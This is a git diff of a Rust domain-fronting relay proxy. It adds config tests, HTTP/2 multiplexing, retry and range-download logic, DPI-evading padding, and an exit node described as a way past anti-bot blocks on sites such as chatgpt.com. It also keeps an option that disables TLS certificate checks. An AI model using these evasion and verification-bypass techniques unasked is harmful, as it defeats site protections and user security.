+        // Direct mode: no script_id, no auth_key — both are only meaningful
         // once the Apps Script relay exists.
+        let s = r#"{
+            "mode": "direct"
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        cfg.validate().expect("direct must validate without script_id / auth_key");
+        assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct);
+    }
+
+    #[test]
+    fn google_only_alias_parses_as_direct() {
+        // Backwards compat: `direct` was named `google_only` before
+        // fronting_groups. Existing configs must continue to load.
         let s = r#"{
             "mode": "google_only"
         }"#;
         let cfg: Config = serde_json::from_str(s).unwrap();
-        cfg.validate().expect("google_only must validate without script_id / auth_key");
-        assert_eq!(cfg.mode_kind().unwrap(), Mode::GoogleOnly);
+        cfg.validate().expect("google_only alias must still validate");
+        assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct);
     }
 
     #[test]
-    fn google_only_ignores_placeholder_script_id() {
+    fn direct_ignores_placeholder_script_id() {
         // UI round-trip: user saved config in apps_script with the placeholder,
-        // then switched mode to google_only. The placeholder should not block
-        // validation in the bootstrap mode.
+        // then switched mode to direct. The placeholder should not block
+        // validation in the no-relay mode.
         let s = r#"{
-            "mode": "google_only",
+            "mode": "direct",
             "script_id": "YOUR_APPS_SCRIPT_DEPLOYMENT_ID"
         }"#;
         let cfg: Config = serde_json::from_str(s).unwrap();
@@ -375,6 +794,68 @@ mod tests {
         assert!(cfg.validate().is_err());
     }
 
+    #[test]
+    fn fronting_groups_parse_and_validate() {
+        let s = r#"{
+            "mode": "direct",
+            "fronting_groups": [
+                {
+                    "name": "vercel",
+                    "ip": "76.76.21.21",
+                    "sni": "react.dev",
+                    "domains": ["vercel.com", "nextjs.org"]
+                }
+            ]
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        cfg.validate().unwrap();
+        assert_eq!(cfg.fronting_groups.len(), 1);
+        assert_eq!(cfg.fronting_groups[0].name, "vercel");
+        assert_eq!(cfg.fronting_groups[0].domains.len(), 2);
+    }
+
+    #[test]
+    fn fronting_group_rejects_invalid_sni_at_validate() {
+        // SNI must parse as a DNS hostname at the same fail-fast point
+        // as the rest of validate(), not later at proxy-startup time.
+        // The CLI and UI both run validate() on Save / before serve.
+        let s = r#"{
+            "mode": "direct",
+            "fronting_groups": [{
+                "name": "bad",
+                "ip": "1.2.3.4",
+                "sni": "not a valid hostname",
+                "domains": ["x.com"]
+            }]
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        let err = cfg.validate().expect_err("invalid sni must fail validate()");
+        let msg = format!("{}", err);
+        assert!(msg.contains("invalid sni"), "error should mention invalid sni: {}", msg);
+    }
+
+    #[test]
+    fn fronting_group_rejects_empty_fields() {
+        for bad in [
+            r#"{ "name": "", "ip": "1.2.3.4", "sni": "a.b", "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "",       "sni": "a.b", "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "",    "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": []        }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": ["  "]    }"#,
+        ] {
+            let s = format!(
+                r#"{{ "mode": "direct", "fronting_groups": [{}] }}"#,
+                bad
+            );
+            let cfg: Config = serde_json::from_str(&s).unwrap();
+            assert!(
+                cfg.validate().is_err(),
+                "expected validation error for: {}",
+                bad
+            );
+        }
+    }
+
     #[test]
     fn rejects_same_http_and_socks5_port() {
         let s = r#"{
@@ -432,6 +913,38 @@ mod rt_tests {
         let _ = std::fs::remove_file(&tmp);
     }
 
+    #[test]
+    fn force_http1_round_trips_through_config() {
+        let json = r#"{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "X",
+  "auth_key": "secretkey123",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "log_level": "info",
+  "verify_ssl": true,
+  "force_http1": true
+}"#;
+        let cfg: Config = serde_json::from_str(json).unwrap();
+        assert!(cfg.force_http1, "force_http1=true must round-trip");
+    }
+
+    #[test]
+    fn force_http1_defaults_false_when_omitted() {
+        // Existing configs from before v1.9.13 don't have the field.
+        // serde(default) must give false (h2 active) so older configs
+        // continue to work and unchanged users get the optimization.
+        let json = r#"{
+  "mode": "apps_script",
+  "auth_key": "secretkey123",
+  "script_id": "X"
+}"#;
+        let cfg: Config = serde_json::from_str(json).unwrap();
+        assert!(!cfg.force_http1, "default must be false (h2 enabled)");
+    }
+
     #[test]
     fn round_trip_minimal_fields_only() {
         // User saves with defaults for everything optional. This is what the
diff --git a/src/domain_fronter.rs b/src/domain_fronter.rs
index a18dd212..d472245d 100644
--- a/src/domain_fronter.rs
+++ b/src/domain_fronter.rs
@@ -6,8 +6,12 @@
 //! `/macros/s/{script_id}/exec`. Apps Script performs the actual upstream
 //! HTTP fetch server-side and returns a JSON envelope.
 //!
-//! TODO: add HTTP/2 multiplexing (`h2` crate) for lower latency.
-//! TODO: add parallel range-based downloads.
+//! Multiplexes over HTTP/2 when the relay edge agrees via ALPN; falls back
+//! to HTTP/1.1 keep-alive when h2 is refused or fails. Range-parallel
+//! downloads are implemented by `relay_parallel_range_to` (writer-based,
+//! streams files larger than Apps Script's single-GET ceiling) with a
+//! buffered `relay_parallel_range` compatibility wrapper for callers that
+//! want a `Vec<u8>` back.
 
 use std::collections::HashMap;
 // AtomicU64 via portable-atomic: native on 64-bit / armv7, spinlock-
@@ -15,12 +19,14 @@ use std::collections::HashMap;
 // is identical to std::sync::atomic::AtomicU64 so call sites need
 // no other changes.
 use portable_atomic::AtomicU64;
-use std::sync::atomic::{AtomicUsize, Ordering};
+use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
 use std::sync::Arc;
 use std::time::{Duration, Instant};
 
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
+use bytes::Bytes;
+use rand::{thread_rng, Rng, RngCore};
 use serde::{Deserialize, Serialize};
 use serde_json::Value;
 use tokio::io::{AsyncReadExt, AsyncWriteExt};
@@ -53,23 +59,235 @@ pub enum FronterError {
     Timeout,
     #[error("json: {0}")]
     Json(#[from] serde_json::Error),
+    /// Wraps another error and tells outer retry/fallback layers
+    /// (`do_relay_with_retry`, the exit-node→direct-Apps-Script
+    /// fallback in `relay()`) NOT to replay the request. Used when an
+    /// h2 attempt failed *after* `send_request` succeeded — the
+    /// request may have already reached and been processed by Apps
+    /// Script (or the exit node), and replaying via h1 / direct path
+    /// would duplicate side effects for non-idempotent methods.
+    ///
+    /// `Display` is transparent so error messages look identical to
+    /// the wrapped variant; tests/observability use `is_retryable()`
+    /// and `into_inner()` to introspect.
+    #[error(transparent)]
+    NonRetryable(Box<FronterError>),
+}
+
+impl FronterError {
+    /// True if outer retry/fallback layers may safely re-issue the
+    /// request. False for `NonRetryable(_)` — those errors signal
+    /// "request may have been sent; do not duplicate."
+    pub fn is_retryable(&self) -> bool {
+        !matches!(self, FronterError::NonRetryable(_))
+    }
+
+    /// Strip the `NonRetryable` wrapper, returning the underlying
+    /// error. Useful for surfacing the original message after the
+    /// retry/fallback policy has already done its job.
+    pub fn into_inner(self) -> FronterError {
+        match self {
+            FronterError::NonRetryable(inner) => *inner,
+            other => other,
+        }
+    }
 }
 
 type PooledStream = TlsStream<TcpStream>;
-const POOL_TTL_SECS: u64 = 45;
+const POOL_TTL_SECS: u64 = 60;
+const POOL_MIN: usize = 8;
+const POOL_REFILL_INTERVAL_SECS: u64 = 5;
 const POOL_MAX: usize = 80;
 const REQUEST_TIMEOUT_SECS: u64 = 25;
 const RANGE_PARALLEL_CHUNK_BYTES: u64 = 256 * 1024;
-// Keep synthetic range stitching bounded. Without this, a buggy or hostile
-// origin can advertise `Content-Range: bytes 0-1/<huge>` and make us build a
-// massive range plan or preallocate an enormous response buffer.
-const MAX_STITCHED_RANGE_BYTES: u64 = 64 * 1024 * 1024;
+/// HTTP/2 connection lifetime before we proactively reopen. Apps Script's
+/// edge has been observed to send GOAWAY at ~10 min anyway, so we cycle
+/// at 9 min to do an orderly reconnect on our schedule rather than
+/// letting an in-flight stream race a server-initiated close.
+const H2_CONN_TTL_SECS: u64 = 540;
+/// Bound on the h2 ready/back-pressure phase only. `SendRequest::ready()`
+/// awaits a free slot under the server's `MAX_CONCURRENT_STREAMS`. A
+/// stall here means the connection is overloaded (or dead at the
+/// muxer level) but no stream has been opened yet — RequestSent::No,
+/// safe to fall back to h1 without duplication risk. Kept short
+/// (5 s) so a saturated conn doesn't burn the caller's whole budget.
+///
+/// The post-send phase (response headers + body drain) uses the
+/// caller-supplied `response_deadline` instead — see
+/// `h2_round_trip`. This way a slow but legitimate Apps Script call
+/// isn't cut off at an arbitrary fixed cap, and Full-mode batches can
+/// honor the user's `request_timeout_secs` setting.
+const H2_READY_TIMEOUT_SECS: u64 = 5;
+/// Default response-phase deadline used by `relay_uncoalesced` callers
+/// (the Apps-Script direct path). Sized to be just under the outer
+/// `REQUEST_TIMEOUT_SECS` (25 s) so an h2 timeout still leaves a few
+/// seconds of outer budget for an h1 fallback round-trip when the
+/// caller chose to retry.
+const H2_RESPONSE_DEADLINE_DEFAULT_SECS: u64 = 20;
+/// Bound on the TCP connect + TLS handshake + h2 handshake phase. A
+/// blackholed `connect_host:443` previously stalled `ensure_h2` until
+/// the outer 25 s timeout fired (returning 504 without ever falling
+/// back). With this bound, a slow open trips after 8 s and the caller
+/// drops to h1 with ~17 s of outer budget to spare.
+const H2_OPEN_TIMEOUT_SECS: u64 = 8;
+/// After an h2 open failure, suppress further open attempts for this
+/// long. Prevents every concurrent caller during an h2 outage from
+/// paying its own full handshake-timeout cost in turn.
+const H2_OPEN_FAILURE_BACKOFF_SECS: u64 = 15;
+/// Same idea as `H2_OPEN_TIMEOUT_SECS` but for the legacy h1 socket
+/// path. Without this, a stuck TCP connect or TLS handshake to a
+/// blackholed `connect_host:443` would block `acquire()` (and the
+/// `warm()` prewarm loop) until the outer batch budget elapsed —
+/// the same symptom #924 hit during the warm-race window. Bounded
+/// here so a single hung handshake aborts fast and the loop / caller
+/// makes progress on the next attempt.
+const H1_OPEN_TIMEOUT_SECS: u64 = 8;
+/// Cadence for Apps Script container keepalive pings. Apps Script
+/// containers go cold after ~5min idle and cost 1-3s on the first
+/// request to wake back up — most painful on YouTube / streaming where
+/// the first chunk after a quiet pause stalls the player.
+const H1_KEEPALIVE_INTERVAL_SECS: u64 = 240;
+/// Largest response body Apps Script's `UrlFetchApp` will deliver before
+/// the script gets killed mid-execution. The hard wire ceiling is ~50 MiB;
+/// after base64 / envelope overhead and edge variance, the practical raw
+/// ceiling for a single GET sits around 40 MiB. This bounds the
+/// **writer-based** API's streaming threshold: above this, the buffered
+/// stitch path's single-GET fallback wouldn't fit through Apps Script
+/// even if invoked, so streaming chunks straight to the wire (with
+/// truncate-on-failure semantics the client can resume via Range)
+/// strictly beats today's 25 s timeout + 504 "Apps Script
+/// unresponsive" (#1042).
+const APPS_SCRIPT_BODY_MAX_BYTES: u64 = 40 * 1024 * 1024;
+
+/// Hard ceiling on how many bytes the streaming side of the
+/// range-parallel path will fetch for a single response. A hostile
+/// origin can advertise an absurd `Content-Range` total
+/// (`bytes 0-262143/<huge>`), pass our probe-checks with a normally-
+/// sized 256 KiB first-chunk body, and then drive us to keep issuing
+/// chunk Apps Script calls until the client disconnects. Each chunk
+/// is one Apps Script invocation, counting against the account's
+/// daily quota (~20 k requests/day on the free tier), so an
+/// unattended hostile download can exhaust the quota and lock the
+/// user out of the relay entirely.
+///
+/// 16 GiB is well above any legitimate single-file download a user
+/// is likely to do through a relay VPN (game patches, OS images,
+/// video files all fit) but small enough to bound worst-case quota
+/// drain to ~65 k chunks per pwned URL. Above this cap the streaming
+/// branch refuses the response with a 502 instead of plowing
+/// through.
+const MAX_STREAMED_RANGE_BYTES: u64 = 16 * 1024 * 1024 * 1024;
+
+/// Byte interval between `range-parallel-stream` progress log lines.
+/// Large downloads through the streaming branch otherwise look stuck
+/// in the logs (one "starting N chunks" line at the top, nothing
+/// until completion or failure). At 16 MiB intervals the operator sees
+/// ~6 lines per 100 MiB and ~64 lines per 1 GiB — useful pace at the
+/// ~1.4 MB/s typical through-relay throughput, and quiet enough that
+/// even a 16 GiB file won't drown the log (~1024 progress lines over
+/// the multi-hour download). Per user feedback on PR #1085.
+const STREAM_PROGRESS_LOG_INTERVAL_BYTES: u64 = 16 * 1024 * 1024;
+
+/// Hard ceiling on the buffered stitch buffer's `Vec::with_capacity(total)`
+/// allocation. Two roles:
+///
+///   1. Memory-safety cap. A hostile/buggy origin advertising
+///      `Content-Range: bytes 0-1/<huge>` could otherwise drive
+///      preallocation to enormous values; totals above this either
+///      stream (writer-based API) or fall back to a single GET
+///      (`Vec<u8>` compatibility wrapper, see
+///      [`DomainFronter::relay_parallel_range`]).
+///   2. Pre-1.9.23 compatibility floor for the `Vec<u8>` wrapper.
+///      Range-capable downloads in the 40-64 MiB band used to stitch
+///      successfully via the buffered path; collapsing this constant
+///      into [`APPS_SCRIPT_BODY_MAX_BYTES`] would have pushed those
+///      onto the single-GET fallback path, where Apps Script returns
+///      502/504 because they're above its 50 MiB response ceiling.
+///      Keeping the two cutoffs separate restores that band's
+///      working buffered behavior for wrapper callers.
+const BUFFERED_STITCH_MAX_BYTES: u64 = 64 * 1024 * 1024;
 
 struct PoolEntry {
     stream: PooledStream,
     created: Instant,
 }
 
+/// Single shared HTTP/2 connection to the Google edge. One TCP/TLS
+/// socket carries up to ~100 concurrent streams (server's
+/// `MAX_CONCURRENT_STREAMS` setting); each relay request takes a clone
+/// of the `SendRequest` handle and opens its own stream. Cheaper than
+/// the legacy per-request socket pool — no head-of-line blocking when
+/// a single Apps Script call stalls.
+///
+/// `generation` is monotonic per fronter and lets `poison_h2_if_gen`
+/// avoid the race where task A's stale failure clears task B's
+/// freshly-reopened healthy cell.
+///
+/// `dead` is set by the spawned connection-driver task when the h2
+/// `Connection` future ends (GOAWAY, network error, normal close).
+/// Without this, the cell silently held a dead `SendRequest` after a
+/// mid-session disconnect — the next request paid a wasted h2 round
+/// trip to detect it via `ready()` failure, AND `run_pool_refill`
+/// kept maintaining the small `POOL_MIN_H2_FALLBACK` (2-socket) pool
+/// instead of expanding to `POOL_MIN` (8). With the flag,
+/// `run_pool_refill` notices h2 is dead within one tick (≤5 s) and
+/// pre-warms the larger fallback pool before the next request burst,
+/// and `ensure_h2` short-circuits the `H2_CONN_TTL_SECS`-based
+/// liveness check on a known-dead cell.
+struct H2Cell {
+    send: h2::client::SendRequest<Bytes>,
+    created: Instant,
+    generation: u64,
+    dead: Arc<AtomicBool>,
+}
+
+/// "Did this request reach Apps Script?" signal carried out of every
+/// h2 failure so callers know whether replaying via h1 is safe.
+///
+/// - `No`: the failure occurred before `send_request` returned. The
+///   stream was never opened on the wire; replaying through h1 is
+///   guaranteed not to duplicate any side effect.
+/// - `Maybe`: `send_request` succeeded (headers queued for sending)
+///   but a later step failed — server may have already received the
+///   request and may already be processing it. Replaying a
+///   non-idempotent op (POST/PUT/DELETE, tunnel write, batch ops)
+///   risks duplicating side effects. Only safe to retry for methods
+///   that are idempotent by HTTP semantics.
+#[derive(Debug, Copy, Clone, PartialEq, Eq)]
+enum RequestSent {
+    No,
+    Maybe,
+}
+
+/// Typed errors from `open_h2`. Used so `ensure_h2` can recognize the
+/// "peer refused h2 in ALPN" outcome and sticky-disable the fast path
+/// without resorting to string matching across function boundaries.
+#[derive(Debug, thiserror::Error)]
+enum OpenH2Error {
+    #[error("ALPN did not negotiate h2; peer prefers http/1.1")]
+    AlpnRefused,
+    #[error("io: {0}")]
+    Io(#[from] std::io::Error),
+    #[error("tls: {0}")]
+    Tls(#[from] rustls::Error),
+    #[error("dns: {0}")]
+    Dns(#[from] rustls::pki_types::InvalidDnsNameError),
+    #[error("h2 handshake: {0}")]
+    Handshake(String),
+}
+
+impl From<OpenH2Error> for FronterError {
+    fn from(e: OpenH2Error) -> Self {
+        match e {
+            OpenH2Error::Io(e) => FronterError::Io(e),
+            OpenH2Error::Tls(e) => FronterError::Tls(e),
+            OpenH2Error::Dns(e) => FronterError::Dns(e),
+            OpenH2Error::AlpnRefused => FronterError::Relay("alpn refused h2".into()),
+            OpenH2Error::Handshake(m) => FronterError::Relay(format!("h2 handshake: {}", m)),
+        }
+    }
+}
+
 pub struct DomainFronter {
     connect_host: String,
     /// Pool of SNI domains to rotate through per outbound connection. All of
@@ -96,15 +314,82 @@ pub struct DomainFronter {
     /// Set once we've emitted the "UnknownIssuer means ISP MITM" hint,
     /// so we don't spam it every time a cert-validation error repeats.
     cert_hint_shown: std::sync::atomic::AtomicBool,
+    /// Connector used by `open_h2`: advertises ALPN `["h2", "http/1.1"]`
+    /// when the h2 fast path is enabled, else just `["http/1.1"]`. Never
+    /// used by the h1 pool path — see `tls_connector_h1`.
     tls_connector: TlsConnector,
+    /// Connector used by `open()` (h1 pool warm/refill/acquire). ALPN
+    /// is forced to `["http/1.1"]` so a Google edge that would have
+    /// preferred h2 still negotiates h1 here. Without this, pooled
+    /// sockets could end up speaking h2 frames after handshake, and
+    /// the `write_all(b"GET / HTTP/1.1\r\n...")` fallback would land
+    /// on a server that has no idea what we're doing.
+    tls_connector_h1: TlsConnector,
     pool: Arc<Mutex<Vec<PoolEntry>>>,
+    /// HTTP/2 fast path. `None` until first relay opens it; cleared on
+    /// connection failure or expiry so the next call reopens. Skipped
+    /// entirely when `force_http1` is set or when the peer refused h2
+    /// during ALPN (sticky `h2_disabled`).
+    h2_cell: Arc<Mutex<Option<H2Cell>>>,
+    /// Serializes "open a new h2 connection" attempts so that during
+    /// an outage, only one task pays the handshake cost — concurrent
+    /// callers see the lock contended via `try_lock` and fall through
+    /// to h1 immediately rather than queueing behind a slow handshake.
+    /// Distinct from `h2_cell` so the cell mutex is never held across
+    /// network I/O.
+    h2_open_lock: Arc<Mutex<()>>,
+    /// Monotonic (`Instant`) timestamp of the last failed `open_h2`. While
+    /// within `H2_OPEN_FAILURE_BACKOFF_SECS` of this, `ensure_h2` returns None
+    /// without retrying — prevents thundering-herd handshake attempts
+    /// during transient h2 outages.
+    h2_open_failed_at: Arc<Mutex<Option<Instant>>>,
+    /// Monotonic counter for `H2Cell::generation`. Each successful
+    /// `open_h2` increments and tags the new cell so `poison_h2_if_gen`
+    /// can avoid the race where a stale failure clears a freshly-opened
+    /// cell that another task just installed.
+    h2_generation: Arc<AtomicU64>,
+    /// Set when ALPN negotiates http/1.1 (peer refused h2) or when
+    /// `force_http1` is true. Sticky for the lifetime of the fronter:
+    /// once we know this peer doesn't speak h2, don't keep retrying
+    /// the handshake on every relay call.
+    h2_disabled: Arc<AtomicBool>,
     cache: Arc<ResponseCache>,
     inflight: Arc<Mutex<HashMap<String, broadcast::Sender<Vec<u8>>>>>,
     coalesced: AtomicU64,
     blacklist: Arc<std::sync::Mutex<HashMap<String, Instant>>>,
+    /// Per-deployment rolling timeout counter. Maps `script_id` →
+    /// `(window_start, strike_count)`. Reset when the window expires
+    /// or when a batch succeeds. Triggers a short-cooldown blacklist
+    /// once `auto_blacklist_strikes` is reached. Distinct from `blacklist`
+    /// because strike state is per-deployment health bookkeeping, not the
+    /// permanent ban list.
+    script_timeouts: Arc<std::sync::Mutex<HashMap<String, (Instant, u32)>>>,
     relay_calls: AtomicU64,
     relay_failures: AtomicU64,
     bytes_relayed: AtomicU64,
+    /// Relay calls that successfully completed over the h2 fast path,
+    /// across **all** entry points: Apps-Script direct relays,
+    /// exit-node outer calls, full-mode tunnel single ops, and
+    /// full-mode tunnel batches.
+    ///
+    /// **Not** comparable to `relay_calls`: that counter only counts
+    /// the Apps-Script-direct path (incremented in `relay_uncoalesced`).
+    /// The other three paths bypass `relay_uncoalesced` entirely, so in
+    /// full-mode deployments `h2_calls` can exceed `relay_calls` —
+    /// reading their ratio as a "% on h2" gives a wrong number.
+    ///
+    /// To gauge h2 health, compute `h2_calls / (h2_calls + h2_fallbacks)`.
+    /// That's the success ratio across all transports; a healthy
+    /// deployment shows > 95 %.
+    h2_calls: AtomicU64,
+    /// Relay calls that attempted h2 but had to fall back to h1
+    /// (transient handshake failure, mid-stream error, conn poisoned,
+    /// open backoff, or `RequestSent::No` failure that the call site
+    /// chose to retry on h1). Same all-entry-points scope as
+    /// `h2_calls`. A persistently high `h2_fallbacks / (h2_calls +
+    /// h2_fallbacks)` ratio indicates an unhealthy h2 conn or a flaky
+    /// middlebox eating h2 frames; consider `force_http1: true`.
+    h2_fallbacks: AtomicU64,
     /// Per-host breakdown of traffic going through this fronter. Keyed by
     /// the host of the URL (e.g. "api.x.com"). Read-mostly; only touched
     /// on the slow path (once per relayed request), so a plain Mutex is
@@ -123,6 +408,36 @@ pub struct DomainFronter {
     today_calls: AtomicU64,
     today_bytes: AtomicU64,
     today_key: std::sync::Mutex<String>,
+    /// Suppress the random `_pad` field that v1.8.0+ adds to outbound
+    /// payloads. Mirrors `Config::disable_padding` (#391). Default false
+    /// (padding active = stronger DPI defense at +25% bandwidth cost).
+    disable_padding: bool,
+    /// Per-instance auto-blacklist tuning. Mirrors `Config::auto_blacklist_*`
+    /// (#391, #444). Cached here so the hot path in `record_timeout_strike`
+    /// doesn't have to reach back through the Config (which we don't keep
+    /// a reference to).
+    auto_blacklist_strikes: u32,
+    auto_blacklist_window: Duration,
+    auto_blacklist_cooldown: Duration,
+    /// Per-batch HTTP timeout. Mirrors `Config::request_timeout_secs`
+    /// (#430, masterking32 PR #25). Read by `tunnel_client::fire_batch`
+    /// so a single config field tunes the timeout used everywhere.
+    batch_timeout: Duration,
+    /// Optional second-hop exit node (Deno Deploy / fly.io / etc.)
+    /// to bypass CF-anti-bot blocks on sites that flag Google datacenter
+    /// IPs (chatgpt.com, claude.ai, grok.com, x.com). Mirrors
+    /// `Config::exit_node`. When `exit_node_enabled` is false (the more
+    /// common state), all relay traffic takes the regular Apps Script
+    /// path. When true, hosts matching `exit_node_hosts` (or all hosts
+    /// when `exit_node_full`) route through the exit-node URL inside
+    /// the Apps Script call.
+    exit_node_enabled: bool,
+    exit_node_url: String,
+    exit_node_psk: String,
+    exit_node_full: bool,
+    /// Pre-normalized (lowercased, leading-dot stripped) host list for
+    /// fast O(N) match in `exit_node_matches`.
+    exit_node_hosts: Vec<String>,
 }
 
 /// Aggregated stats for one remote host.
@@ -146,6 +461,12 @@ impl HostStat {
 
 const BLACKLIST_COOLDOWN_SECS: u64 = 600;
 
+// Auto-blacklist tuning now lives in per-instance `DomainFronter` fields
+// driven by `Config::auto_blacklist_strikes` / `_window_secs` /
+// `_cooldown_secs` (#391, #444); the old constants were removed. See the
+// `Config` doc comments for tuning guidance and `default_auto_blacklist_*`
+// for the historical defaults (3 strikes / 30s window / 120s cooldown).
+
 /// Request payload sent to Apps Script (single, non-batch).
 #[derive(Serialize)]
 struct RelayRequest<'a> {
@@ -193,6 +514,8 @@ pub struct TunnelResponse {
     /// `e` only when this is `None` and compatibility is needed.
     #[serde(default)]
     pub code: Option<String>,
+    #[serde(default)]
+    pub seq: Option<u64>,
 }
 
 /// A single op in a batch tunnel request.
@@ -207,6 +530,10 @@ pub struct BatchOp {
     pub port: Option<u16>,
     #[serde(skip_serializing_if = "Option::is_none")]
     pub d: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub seq: Option<u64>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub wseq: Option<u64>,
 }
 
 /// Batch tunnel response from Apps Script / tunnel node.
@@ -224,19 +551,43 @@ impl DomainFronter {
         if script_ids.is_empty() {
             return Err(FronterError::Relay("no script_id configured".into()));
         }
-        let tls_config = if config.verify_ssl {
-            let mut roots = rustls::RootCertStore::empty();
-            roots.extend(webpki_roots::TLS_SERVER_ROOTS.iter().cloned());
-            ClientConfig::builder()
-                .with_root_certificates(roots)
-                .with_no_client_auth()
-        } else {
-            ClientConfig::builder()
-                .dangerous()
-                .with_custom_certificate_verifier(Arc::new(NoVerify))
-                .with_no_client_auth()
+        // Helper that builds a fresh ClientConfig with the verifier
+        // policy from config. We need two of these so the h2-capable
+        // and h1-only paths can advertise different ALPN sets without
+        // mutating one shared config across calls.
+        let build_tls_config = || {
+            if config.verify_ssl {
+                let mut roots = rustls::RootCertStore::empty();
+                roots.extend(webpki_roots::TLS_SERVER_ROOTS.iter().cloned());
+                ClientConfig::builder()
+                    .with_root_certificates(roots)
+                    .with_no_client_auth()
+            } else {
+                ClientConfig::builder()
+                    .dangerous()
+                    .with_custom_certificate_verifier(Arc::new(NoVerify))
+                    .with_no_client_auth()
+            }
         };
-        let tls_connector = TlsConnector::from(Arc::new(tls_config));
+
+        // Connector for `open_h2`: advertises h2 first (or just h1 if
+        // the kill switch is set, in which case both connectors end up
+        // identical — fine, just slightly redundant).
+        let mut tls_h2 = build_tls_config();
+        if !config.force_http1 {
+            tls_h2.alpn_protocols = vec![b"h2".to_vec(), b"http/1.1".to_vec()];
+        } else {
+            tls_h2.alpn_protocols = vec![b"http/1.1".to_vec()];
+        }
+        let tls_connector = TlsConnector::from(Arc::new(tls_h2));
+
+        // Connector for `open()` (h1 pool path). ALPN is forced to
+        // http/1.1 so a Google edge that would otherwise prefer h2
+        // still negotiates h1 here — pooled sockets always speak the
+        // protocol the fallback path expects.
+        let mut tls_h1 = build_tls_config();
+        tls_h1.alpn_protocols = vec![b"http/1.1".to_vec()];
+        let tls_connector_h1 = TlsConnector::from(Arc::new(tls_h1));
 
         Ok(Self {
             connect_host: config.google_ip.clone(),
@@ -253,26 +604,102 @@ impl DomainFronter {
             script_ids,
             script_idx: AtomicUsize::new(0),
             tls_connector,
+            tls_connector_h1,
             pool: Arc::new(Mutex::new(Vec::new())),
+            h2_cell: Arc::new(Mutex::new(None)),
+            h2_open_lock: Arc::new(Mutex::new(())),
+            h2_open_failed_at: Arc::new(Mutex::new(None)),
+            h2_generation: Arc::new(AtomicU64::new(0)),
+            h2_disabled: Arc::new(AtomicBool::new(config.force_http1)),
             cache: Arc::new(ResponseCache::with_default()),
             inflight: Arc::new(Mutex::new(HashMap::new())),
             coalesced: AtomicU64::new(0),
             blacklist: Arc::new(std::sync::Mutex::new(HashMap::new())),
+            script_timeouts: Arc::new(std::sync::Mutex::new(HashMap::new())),
             relay_calls: AtomicU64::new(0),
             relay_failures: AtomicU64::new(0),
             bytes_relayed: AtomicU64::new(0),
+            h2_calls: AtomicU64::new(0),
+            h2_fallbacks: AtomicU64::new(0),
             per_site: Arc::new(std::sync::Mutex::new(HashMap::new())),
             today_calls: AtomicU64::new(0),
             today_bytes: AtomicU64::new(0),
-            today_key: std::sync::Mutex::new(current_utc_day_key()),
+            today_key: std::sync::Mutex::new(current_pt_day_key()),
+            disable_padding: config.disable_padding,
+            auto_blacklist_strikes: config.auto_blacklist_strikes.max(1),
+            auto_blacklist_window: Duration::from_secs(
+                config.auto_blacklist_window_secs.clamp(1, 3600),
+            ),
+            auto_blacklist_cooldown: Duration::from_secs(
+                config.auto_blacklist_cooldown_secs.clamp(1, 86400),
+            ),
+            batch_timeout: Duration::from_secs(
+                config.request_timeout_secs.clamp(5, 300),
+            ),
+            exit_node_enabled: config.exit_node.enabled
+                && !config.exit_node.relay_url.is_empty()
+                && !config.exit_node.psk.is_empty(),
+            exit_node_url: config
+                .exit_node
+                .relay_url
+                .trim_end_matches('/')
+                .to_string(),
+            exit_node_psk: config.exit_node.psk.clone(),
+            exit_node_full: matches!(
+                config.exit_node.mode.to_ascii_lowercase().as_str(),
+                "full"
+            ),
+            exit_node_hosts: config
+                .exit_node
+                .hosts
+                .iter()
+                .map(|h| h.trim().trim_start_matches('.').to_ascii_lowercase())
+                .filter(|h| !h.is_empty())
+                .collect(),
         })
     }
 
+    /// True when the configured exit node should handle this URL.
+    /// In `selective` mode (default), checks the host against the
+    /// pre-normalized `exit_node_hosts` list (exact match OR
+    /// dot-anchored suffix, mirroring `passthrough_hosts` semantics).
+    /// In `full` mode, every URL routes through the exit node.
+    pub(crate) fn exit_node_matches(&self, url: &str) -> bool {
+        if !self.exit_node_enabled {
+            return false;
+        }
+        if self.exit_node_full {
+            return true;
+        }
+        let host = match extract_host(url) {
+            Some(h) => h,
+            None => return false,
+        };
+        let host_lc = host.to_ascii_lowercase();
+        for entry in &self.exit_node_hosts {
+            if host_lc == *entry || host_lc.ends_with(&format!(".{}", entry)) {
+                return true;
+            }
+        }
+        false
+    }
+
+    /// Per-batch HTTP round-trip timeout. Read by `tunnel_client` so the
+    /// `BATCH_TIMEOUT` constant doesn't have to be touched on every config
+    /// change. Clamped to `[5s, 300s]` at construction.
+    pub(crate) fn batch_timeout(&self) -> Duration {
+        self.batch_timeout
+    }
+
     /// Record one relay call toward the daily budget. Called once per
     /// outbound Apps Script fetch. Rolls over both daily counters at
-    /// 00:00 UTC.
-    fn record_today(&self, bytes: u64) {
-        let today = current_utc_day_key();
+    /// 00:00 Pacific Time, matching Apps Script's quota reset cadence
+    /// (#230, #362). Crate-public so the Full-mode batch path in
+    /// `tunnel_client::fire_batch` can wire into the same accounting
+    /// (Apps Script sees Full-mode batches as ordinary `UrlFetchApp`
+    /// calls and counts them against the same daily quota).
+    pub(crate) fn record_today(&self, bytes: u64) {
+        let today = current_pt_day_key();
         // Fast path: same day as what we last saw. No lock.
         let mut guard = self.today_key.lock().unwrap();
         if *guard != today {
@@ -317,8 +744,8 @@ impl DomainFronter {
         // Read today_key under lock and cheaply check rollover so the
         // UI never sees stale "today_calls=1847" on a day where no
         // traffic has flowed yet (e.g. user left the app open past
-        // midnight UTC).
-        let today_now = current_utc_day_key();
+        // midnight PT).
+        let today_now = current_pt_day_key();
         let today_key = {
             let mut guard = self.today_key.lock().unwrap();
